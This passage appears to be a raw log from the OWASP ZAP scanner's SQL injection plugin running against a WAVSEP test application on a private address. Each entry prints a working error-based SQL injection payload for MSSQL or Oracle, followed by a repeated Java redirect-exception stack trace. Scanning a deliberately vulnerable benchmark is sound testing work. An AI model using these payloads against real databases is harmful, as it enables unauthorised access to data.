org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679237 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [') AND 2502=CONVERT(INT,(SELECT CHAR(58)+CHAR(120)+CHAR(97)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (2502=2502) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(97)+CHAR(113)+CHAR(58))) AND ('KdDm'='KdDm] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/') AND 2502=CONVERT(INT,(SELECT CHAR(58)+CHAR(120)+CHAR(97)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (2502=2502) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(97)+CHAR(113)+CHAR(58))) AND ('KdDm'='KdDm at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679237 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt) AND 8562=CONVERT(INT,(SELECT CHAR(58)+CHAR(120)+CHAR(97)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (8562=8562) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(97)+CHAR(113)+CHAR(58))) AND (3487=3487] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: 172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt) AND 8562=CONVERT(INT,(SELECT CHAR(58)+CHAR(120)+CHAR(97)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (8562=8562) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(97)+CHAR(113)+CHAR(58))) AND (3487=3487 at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: incorrect path at org.apache.commons.httpclient.URI.setRawPath(URI.java:2862) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679239 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt AND 4914=CONVERT(INT,(SELECT CHAR(58)+CHAR(120)+CHAR(97)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (4914=4914) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(97)+CHAR(113)+CHAR(58)))] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: 172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt AND 4914=CONVERT(INT,(SELECT CHAR(58)+CHAR(120)+CHAR(97)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (4914=4914) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(97)+CHAR(113)+CHAR(58))) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: incorrect path at org.apache.commons.httpclient.URI.setRawPath(URI.java:2862) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679239 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [' AND 6474=CONVERT(INT,(SELECT CHAR(58)+CHAR(120)+CHAR(97)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (6474=6474) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(97)+CHAR(113)+CHAR(58))) AND 'vuVE'='vuVE] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/' AND 6474=CONVERT(INT,(SELECT CHAR(58)+CHAR(120)+CHAR(97)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (6474=6474) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(97)+CHAR(113)+CHAR(58))) AND 'vuVE'='vuVE at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679241 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [%' AND 8891=CONVERT(INT,(SELECT CHAR(58)+CHAR(120)+CHAR(97)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (8891=8891) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(97)+CHAR(113)+CHAR(58))) AND '%'='] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/%' AND 8891=CONVERT(INT,(SELECT CHAR(58)+CHAR(120)+CHAR(97)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (8891=8891) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(97)+CHAR(113)+CHAR(58))) AND '%'=' at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679241 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt') AND 5135=CONVERT(INT,(SELECT CHAR(58)+CHAR(120)+CHAR(97)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (5135=5135) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(97)+CHAR(113)+CHAR(58))) AND ('REfG'='REfG] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: 172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt') AND 5135=CONVERT(INT,(SELECT CHAR(58)+CHAR(120)+CHAR(97)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (5135=5135) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(97)+CHAR(113)+CHAR(58))) AND ('REfG'='REfG at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: incorrect path at org.apache.commons.httpclient.URI.setRawPath(URI.java:2862) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679242 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ AND 7431=CONVERT(INT,(SELECT CHAR(58)+CHAR(120)+CHAR(97)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (7431=7431) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(97)+CHAR(113)+CHAR(58)))-- vVvJ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/ AND 7431=CONVERT(INT,(SELECT CHAR(58)+CHAR(120)+CHAR(97)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (7431=7431) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(97)+CHAR(113)+CHAR(58)))-- vVvJ at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679243 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt' AND 6737=CONVERT(INT,(SELECT CHAR(58)+CHAR(120)+CHAR(97)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (6737=6737) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(97)+CHAR(113)+CHAR(58))) AND 'pgJR'='pgJR] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: 172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt' AND 6737=CONVERT(INT,(SELECT CHAR(58)+CHAR(120)+CHAR(97)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (6737=6737) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(97)+CHAR(113)+CHAR(58))) AND 'pgJR'='pgJR at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: incorrect path at org.apache.commons.httpclient.URI.setRawPath(URI.java:2862) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679244 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [) AND 5939=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58)||(SELECT (CASE WHEN (5939=5939) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)||CHR(62))) FROM DUAL) AND (3285=3285] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/) AND 5939=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58)||(SELECT (CASE WHEN (5939=5939) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)||CHR(62))) FROM DUAL) AND (3285=3285 at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679244 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt%' AND 3159=CONVERT(INT,(SELECT CHAR(58)+CHAR(120)+CHAR(97)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (3159=3159) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(97)+CHAR(113)+CHAR(58))) AND '%'='] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: 172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt%' AND 3159=CONVERT(INT,(SELECT CHAR(58)+CHAR(120)+CHAR(97)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (3159=3159) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(97)+CHAR(113)+CHAR(58))) AND '%'=' at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: incorrect path at org.apache.commons.httpclient.URI.setRawPath(URI.java:2862) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679245 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ AND 8935=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58)||(SELECT (CASE WHEN (8935=8935) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)||CHR(62))) FROM DUAL)] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/ AND 8935=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58)||(SELECT (CASE WHEN (8935=8935) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)||CHR(62))) FROM DUAL) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679246 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt AND 7237=CONVERT(INT,(SELECT CHAR(58)+CHAR(120)+CHAR(97)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (7237=7237) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(97)+CHAR(113)+CHAR(58)))-- tUzj] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: 172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt AND 7237=CONVERT(INT,(SELECT CHAR(58)+CHAR(120)+CHAR(97)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (7237=7237) THEN CHAR(49) ELSE CHAR(48) 